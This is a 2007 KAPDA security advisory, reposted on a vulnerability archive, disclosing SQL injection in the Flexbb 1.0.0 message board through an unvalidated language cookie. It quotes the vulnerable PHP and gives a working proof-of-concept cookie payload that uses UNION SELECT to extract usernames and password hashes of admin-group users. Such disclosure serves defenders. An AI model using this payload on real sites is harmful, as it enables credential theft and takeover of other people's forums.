Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16494
HistoryMar 28, 2007 - 12:00 a.m.

[KAPDA::#64] - Flexbb Sql Injection

2007-03-2800:00:00
vulners.com
17

KAPDA New advisory
Vendor: http://www.flexbb.net
Vulnerable Version: 1.0.0 10005 Beta Release 1
Bug: SQL Injection
Exploitation: Remote with browser

Description:

Flexbb is a freely available PHP-based message board
program that uses a MySQL database.

Vulnerability:

Sql Injection:
The software does not properly validate user-supplied
input that may allow a remote user to launch Sql
injection attacks.
There are multiple Input Validation errors, for
example:
// Code Snippet
// Includes/Start.php
// Lines #190-197
if($_COOKIE['flexbb_lang_id'] == "")
{
$lang_id = $config['default_lang_id'];
}
else
{
$lang_id = $_COOKIE['flexbb_lang_id']; //—>Input
Validation Error
}

POC:

Condition: Magic quotes GPC = Off
GET: http://example.com/flexbb/index.php?debug=1
Cookie Name = flexbb_lang_id
Cookie Value = none' UNION SELECT 'en',`username`,
`password`,1,1 FROM `flexbb_users` WHERE `group` = '4

original Advisory:

http://www.kapda.ir/advisory-481.html

Solution:

No response from vendor, there is no solution at the
time of this entry.

Credit :

Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran
[http://www.KAPDA.ir]


TV dinner still cooling?
Check out "Tonight's Picks" on Yahoo! TV.
http://tv.yahoo.com/